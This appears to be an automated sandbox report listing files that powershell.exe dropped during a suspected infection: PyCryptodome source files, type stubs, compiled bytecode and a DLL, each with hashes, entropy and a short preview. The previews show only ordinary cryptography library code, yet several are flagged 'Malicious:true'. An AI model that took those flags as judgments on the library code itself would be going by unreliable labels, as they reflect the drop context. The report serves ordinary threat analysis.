                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3274
                                                                                                                                                                                                                              Entropy (8bit):4.693836120739867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:gY+1BttCqDO2HfgdO3dSXWxAzPB0d8vHWHN6xCvsrWjWO7K1T+vEZq9KsDsD/:ZKBttCqDO2/1AzpatLjST+vt9+/
                                                                                                                                                                                                                              MD5:05BAB8AC5A99E7F1E3A930AD0241310A
                                                                                                                                                                                                                              SHA1:1C86AE14E272E56C5F7F9B674222AC5C72E5FAA1
                                                                                                                                                                                                                              SHA-256:1FBA768D59659EAE57CFBF6E2DD703365744B49FE47BB8EEE11A80A129597735
                                                                                                                                                                                                                              SHA-512:FBE7D4C991EFAB21EA6D2E6B1FB98B014C2F823003BF65957B81587B6C19C01FBE2527232EC8B23AE59057A966D1103E6B193CD86CE9CB2E479D5861FFEC9D43
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from Crypto.Util.number import long_to_bytes..from Crypto.PublicKey.ECC import EccKey......def _compute_ecdh(key_priv, key_pub):.. # See Section 5.7.1.2 in NIST SP 800-56Ar3.. pointP = key_pub.pointQ * key_priv.d.. if pointP.is_point_at_infinity():.. raise ValueError("Invalid ECDH point").. z = long_to_bytes(pointP.x, pointP.size_in_bytes()).. return z......def key_agreement(**kwargs):.. """Perform a Diffie-Hellman key agreement..... Keywords:.. kdf (callable):.. A key derivation function that accepts ``bytes`` as input and returns.. ``bytes``... static_priv (EccKey):.. The local static private key. Optional... static_pub (EccKey):.. The static public key that belongs to the peer. Optional... eph_priv (EccKey):.. The local ephemeral private key, generated for this session. Optional... eph_pub (EccKey):.. The ephemeral public key, received from the peer for this session. Optional..... At le
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):482
                                                                                                                                                                                                                              Entropy (8bit):5.105314197006538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB9mNRE1BgS+1dwCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1R+169gvC/gyfyv
                                                                                                                                                                                                                              MD5:69A7EFD78AFDEF04820558CECC146AE6
                                                                                                                                                                                                                              SHA1:3CF02E290E2C748FEB0AA29B55FB9C8BE7421E81
                                                                                                                                                                                                                              SHA-256:FC079D87295B952D7A52929D205ED7BBED1EE2741479E96337FA7EBC9428A26A
                                                                                                                                                                                                                              SHA-512:8F1CD56424FC12C86AA16ED0DBC076E2D0FA7714CE93F4D9B1C109BB661285563E4AA2918C48A2DC076B945ED2207197F53683946E29C78F1B9F32E668E54F03
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Crypto.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22955
                                                                                                                                                                                                                              Entropy (8bit):4.822109096386609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:We0Nt96AroMwVVlrV4ENoDZtzQNzRS1zyid3KKKXVvEtUa:9wt5kV4QoDZAzRCnKlm
                                                                                                                                                                                                                              MD5:78EA2251CC2560710EFF6D782F1C705E
                                                                                                                                                                                                                              SHA1:92A4E050AE5883220F461FC01ED7C0CA1ED4DF16
                                                                                                                                                                                                                              SHA-256:F47D981850B12CD0ECE583D13EF5F29F0BF72D60A2D089C3FC093F02EA5D1746
                                                                                                                                                                                                                              SHA-512:E52616C1DFB149357FBD8B59D0E0CF392362A03065DC232354D1061DA393F5E30C030A950998A99AD606698E2AA4A769F9D9FD6A3A09281736B1168E5A023329
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# coding=utf-8..#..# KDF.py : a collection of Key Derivation Functions..#..# Part of the Python Cryptography Toolkit..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2038
                                                                                                                                                                                                                              Entropy (8bit):4.91503915615325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                                                                                                              MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                                                                                                              SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                                                                                                              SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                                                                                                              SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9056
                                                                                                                                                                                                                              Entropy (8bit):4.7874787545071635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:oqrskrs9t3q/IG1RYr24zEqG5TFiW4m1DH/T:Xrskrs9VqPaQqSTFiWV7
                                                                                                                                                                                                                              MD5:8F0F67CEDF28EC2C022DC31587D03BB5
                                                                                                                                                                                                                              SHA1:86EC75E3ACBF09488E0592A026F40FF26A27BBF5
                                                                                                                                                                                                                              SHA-256:4DB85B5FF214482B6A912C0E90E73F8164B54AC4CC69390DE67024A4B6FD164D
                                                                                                                                                                                                                              SHA-512:B6EC5234AF9CC7C513D7FD95BD1638177B0778FA65E19813319B7951B3846F3F83BADC4CFD85FA465CB98886CA73F206228FA336F0F62FFA8E23E455A1BC5BE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# SecretSharing.py : distribute a secret amongst a group of participants..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DI
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):820
                                                                                                                                                                                                                              Entropy (8bit):4.725635475246741
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                                                                                                              MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                                                                                                              SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                                                                                                              SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                                                                                                              SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1585
                                                                                                                                                                                                                              Entropy (8bit):5.205262016568805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHm:MwDqrYJALrYJHdt3EHGuIG
                                                                                                                                                                                                                              MD5:359E5E3040820102CF68398BFCEF8840
                                                                                                                                                                                                                              SHA1:893ABCEC60366D62B13FC6679599EFFFBEFF1450
                                                                                                                                                                                                                              SHA-256:5E519AC6FBC45FDC85A460E0DDAD070BAF48BC16C1BA2906A67168F89E3F0899
                                                                                                                                                                                                                              SHA-512:953D5D7B66792121BFE24C805B33704E9B2491EB956BAB0F82497455E3CD1388E7DD134685D56E38E6D10D5B45894FA2D9DEBFCAFD53E21D5A600892A11A63BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44
                                                                                                                                                                                                                              Entropy (8bit):4.516027641266231
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                                                                                                              MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                                                                                                              SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                                                                                                              SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                                                                                                              SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3529
                                                                                                                                                                                                                              Entropy (8bit):5.625266711859142
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:fzSki4hvBG9pwyzKO9s1PrMfXUBWlzavnAHVV/s5xgHj1gf8YYLkEMFr201sb+:7Ski4ZBOPzWPrOxzu+VV/BukLkEk7
                                                                                                                                                                                                                              MD5:5973E80232EF952968B9964F9A1427C6
                                                                                                                                                                                                                              SHA1:F776C3490D7AFFC778F9F66D45F87C8FF22D91CE
                                                                                                                                                                                                                              SHA-256:FD05B6CB195B743C30F48D0D90A52405698B3938C6BA11399558F04E82D8C909
                                                                                                                                                                                                                              SHA-512:65973D379C39D32BEF0FC3D783E5B8BDCC7EA842859F6099648DA39250D756CE867F091881AE07EB53B6766424B63B6A86B0A432E576B5F7CE5EA2A12A0F4EC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................(.....d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.y.)......)...long_to_bytes)...EccKeyc..........................|.j...................|.j...................z...}.|.j...........................r.t.........d...........t.........|.j...................|.j...................................}.|.S.).Nz.Invalid ECDH point)...pointQ..d..is_point_at_infinity..ValueErrorr......x..size_in_bytes)...key_priv..key_pub..pointP..zs.... .CC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Protocol/DH.py.._compute_ecdhr........sJ.........^.^.h.j.j..(.F.....".."..$.....-..........f.h.h... 4. 4. 6..7.A....H.....c..........................|.j...................d.d.........}.|.j...................d.d.........}.|.j...................d.d.........}.|.j...................d.d.........}.|.j...................d.d.........}.|...t.........d...........d.}.d.}.d.}.d...}.|.....|.|.|.d.d.........}.|.d.z...}.|.....|.|.|.d.d.........}.|.d.z...}.|.....|.|.|.d.d.........}.|.d.z...}.|....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26805
                                                                                                                                                                                                                              Entropy (8bit):5.531189242857296
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:7+LFMLX4XG+mHWOvDeP0IxsAB6sBQwOT3sd+cTRy2Pn/ajDtHo1h0jA:7+eJHWOLy0IxsABZO48ey2X4hHoEjA
                                                                                                                                                                                                                              MD5:8456F4688BD12C4DA1FEBAA68D68BE4D
                                                                                                                                                                                                                              SHA1:E9AD5E43B4DE9AE4EAAAF98ACD3F1B3BC5D25733
                                                                                                                                                                                                                              SHA-256:8B2C6CF149984B3E129BC82A981EF57916ED7A2C0411F5B9275973045BD76615
                                                                                                                                                                                                                              SHA-512:6B035440108C4A551D14B8F16D83EBE7A36CB9F9DAD2994E4F7D753E8664E9EF0D87D1D4C683C938AA1750F14E149BB1ECD719880AF2617898B080C5A0777B8B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.Y........................&.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z ..e.d.d.........Z!d.d...Z"d.d...Z#..G.d...d.e$........Z%d.d...Z&d.d...Z'd...Z(d...Z)d...Z*d.d...Z+d...Z,d.d...Z-y.)......N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9034
                                                                                                                                                                                                                              Entropy (8bit):5.496638327298937
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+6Lt0GBwsJ/vsV9FnQDTYfXHjhivyI3STJPyFBiJfI0wAXuUWjs7mH2B6g5rC:+655zX63GYvHjhi6HJ2iNhPgsa2Jw
                                                                                                                                                                                                                              MD5:5ECA20049B36FB680A761975C23FA478
                                                                                                                                                                                                                              SHA1:6990AC702EE552BE99D898542B64C8239B7EF93D
                                                                                                                                                                                                                              SHA-256:A505E4B1F2CE34ED0B183CF18B4412C8EBD87394E60709956574D4BF5E8655AB
                                                                                                                                                                                                                              SHA-512:60DF13EBF5A4A11E8BF1879AAE81AC1745375CC209C50DAC0DE4715E6A0AC15640E63CC8A180DE772CF5E1575C431384EC3D6A2E7D54FF18D03753A1DE460B94
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf`#........................p.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...is_native_int)...number)...long_to_bytes..bytes_to_long)...get_random_bytesc.....................N.....|.|.kD..r.|.|.}.}.d.}.|.r.|.d.z...r.|.|.z...}.|.d.z...}.|.d.z...}.|.r...|.S.).z!Multiply two polynomials in GF(2)r...........)...f1..f2..zs.... .NC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Protocol/SecretSharing.py.._mult_gf2r....(...sJ...........B.w....R.B......A.........6......G.A....q........q...............H.....c...........................|.|.k...r.d.|.f.S.t.........j...................}.d.}.|.}...|.|.........}...|.|.........|.k\..r.d...|.|.........|.z...z...}.|.|.z...}.|.t.........|.|.........z...}...|.|.........|.k\..r...|.|.f.S.).z.. Compute division of polynomials over GF(2).. Given a and b, it finds two polynomials q and r such that:.. a = b*q + r with deg(r)<deg(b). r....r....).r......siz
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):217
                                                                                                                                                                                                                              Entropy (8bit):5.142363975490624
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:xjnKY+ZFZ6+n/5jDw52KNdArM3SsB6IaCkkJmvt:x7WZX6+n/ZzKNBiijank0
                                                                                                                                                                                                                              MD5:022507238FC87F7DC76FAA4A539870F8
                                                                                                                                                                                                                              SHA1:D9A355D30119693DFE3EF63C460E5FE2F08C441E
                                                                                                                                                                                                                              SHA-256:81C05112BE97CCBF5C244FC562E48DB1852F17AB07BDE6201EE524B1F058FFF6
                                                                                                                                                                                                                              SHA-512:1ECB5B16B64E572D76E4617F52C84F0A24901A4AC50837B76BF784CAA30617FC88140C709DA84DDDCD6024AE573E92DBA25AEA7C3CD5050CE284451D50F3CC4A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf1...............................g.d...Z.y.).)...KDF..SecretSharing..DHN)...__all__........IC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Protocol/__init__.py..<module>r........s..........>..)..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                              Entropy (8bit):4.799063285091512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                                                                                                              MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                                                                                                              SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                                                                                                              SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                                                                                                              SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23060
                                                                                                                                                                                                                              Entropy (8bit):4.8542965681461245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:zUe8B4XpyRj8fJ8RbvNWrJVs2okSpSuR4rmSISAX:zH8Qkj8foQrvA4rmSrAX
                                                                                                                                                                                                                              MD5:7F4C4E4A51254CF7C23BAD8DF3940A4B
                                                                                                                                                                                                                              SHA1:19497A8225DD25DA5379CBB343581383D886B97A
                                                                                                                                                                                                                              SHA-256:479862D6D569DDFF438312AF51E1757D6A748ABF932507A3C08564F33DFF6BD5
                                                                                                                                                                                                                              SHA-512:62B6196FCB08A837644697519755F2C01C77A386E5083D5CA79303E2EC33A8525A45A7C589B83F95B553F0EE7F82860F9EB108CF070F6DC45615777DF6370F33
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# PublicKey/DSA.py : DSA signature primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                              Entropy (8bit):4.9317569017679235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                                                                                                              MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                                                                                                              SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                                                                                                              SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                                                                                                              SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):67427
                                                                                                                                                                                                                              Entropy (8bit):4.857152735652469
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:HrpnnHM/SBQx60ma/iVVffcIsutOPT/Tl/fokmC1DuYKG:HrdW6gYffcnjBXYI1
                                                                                                                                                                                                                              MD5:725F8EC9C104AA3C6B0950278B06BC42
                                                                                                                                                                                                                              SHA1:86691C9548643EEC3FCF405B9795EF5A11FDDE8A
                                                                                                                                                                                                                              SHA-256:F17C068FD0BC1DCA2CC84366CF2CCB5CECF89DCB460EA7BE6C3BF64387AB9FB7
                                                                                                                                                                                                                              SHA-512:D9CF278693EAC5866F7AD7B8223F95608BEB1CE255DA6FC31152DA2980B8DC82432FAFF2B2879F094489E53ABE5422F8FA3097AB3277A708698455991E42A421
                                                                                                                                                                                                                              Malicious:true
